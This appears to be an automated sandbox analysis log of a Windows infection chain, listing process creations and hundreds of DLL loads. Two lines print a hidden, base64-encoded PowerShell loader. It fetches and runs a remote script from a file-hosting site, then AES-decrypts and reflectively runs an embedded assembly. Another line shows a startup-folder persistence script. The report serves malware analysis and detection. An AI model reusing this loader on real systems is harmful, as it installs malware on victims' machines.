                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
